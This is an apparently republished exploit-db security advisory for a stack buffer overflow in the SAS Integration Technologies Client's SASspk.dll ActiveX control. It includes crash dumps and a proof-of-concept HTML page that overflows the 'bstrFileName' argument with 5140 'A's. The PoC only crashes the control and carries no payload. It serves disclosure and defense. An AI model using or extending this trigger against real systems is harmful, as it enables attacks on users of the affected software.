SAS Integration Technologies Client 9.31_M1 ‘SASspk.dll’ – Stack Overflow

  • 作者: LiquidWorm
    日期: 2013-05-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/25714/
  • <!--
    
    SAS Integration Technologies Client 9.31_M1 (SASspk.dll) Stack-based Overflow
    
    
    Vendor: SAS Institute Inc.
    Product web page: http://www.sas.com
    Affected version: Deployment Manager 9.3.0.0 (Model 12.05, TS1M2)
    SAS Integration Technologies Client 9.31_M1
    
    Summary: SAS Integration Technologies provides you with software that
    enables you to build a secure client/server infrastructure on which to
    implement SAS distributed processing solutions. With SAS Integration
    Technologies, you can integrate SAS with other applications in your
    enterprise; provide proactive delivery of information from SAS throughout
    the enterprise; extend the capabilities of SAS to meet your organization's
    specific needs; and develop your own distributed applications that leverage
    the analytic and reporting powers of SAS. The SAS Deployment Manager is
    used for post-installation configuration tasks such as configuring some
    products, applying hot fixes, updating metadata, and uninstalling SAS
    software.
    
    Desc: The SASspk module (SASspk.dll) version 9.310.0.11307, has a
    function called 'RetrieveBinaryFile()' which has one parameter called
    'bstrFileName' which takes arguments as strings as defined in the
    function itself as ISPKBinaryFile from the SASPackageRetrieve library.
    Stack-based buffer overflow was discovered in one of the fuzzing
    processes that could allow arbitrary code execution by an attacker
    when exploiting the non-sanitized 'bstrFileName' parameter.
    
    
    ======================================================================
    
    ArgDump:
    --------------------------------------------------
    EBP+8	007EA404 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
    EBP+12	0016EB30 -> 00000000
    EBP+16	00940E68 -> BAADF00D
    EBP+20	41414141
    EBP+24	41414141
    EBP+28	41414141
    
    
    Stack Dump:
    --------------------------------------------------
    1699E0 60 0E 94 00 00 00 00 00 01 00 00 00 60 0E 94 00[`...........`...]
    1699F0 30 28 00 00 00 00 00 00 00 00 00 00 E4 EA 16 00[................]
    169A00 33 DF 4D 00 04 A4 7E 00 30 EB 16 00 68 0E 94 00[..M.........h...]
    169A10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41[................]
    169A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41[................]
    
    ======================================================================
    
    
    Tested on: Microsoft Windows 7 Ultimate SP1 EN (32/64bit)
     Microsoft Windows 7 Enterprise EN (32/64bit)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2013-5142
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5142.php
    
    
    20.04.2013
    
    -->
    
    
    <html>
    <title>SAS Integration Technologies Client ActiveX Stack BoF 0-day</title>
    <body>
    <object id='smash' classid='clsid:DDF47362-6319-11D4-87C0-00C04F48BC53' />
    <script>
    
    function run()
    {
    	targetFile = "C:\Program Files\SASHome\x86\Integration Technologies\SASspk.dll"
    	prototype= "Function RetrieveBinaryFile ( ByVal bstrFileName As String ) As ISPKBinaryFile"
    	memberName = "RetrieveBinaryFile"
    	progid = "SASPackageRetrieve.SPKRetrieve"
    	argCount = 1
    	arg1=String(5140, "A")
    	smash.RetrieveBinaryFile arg1
    }
    
    </script><center><br /><br />
    <input language=JavaScript onclick=run() type=button value="Test">
    </center>
    </body>
    </html>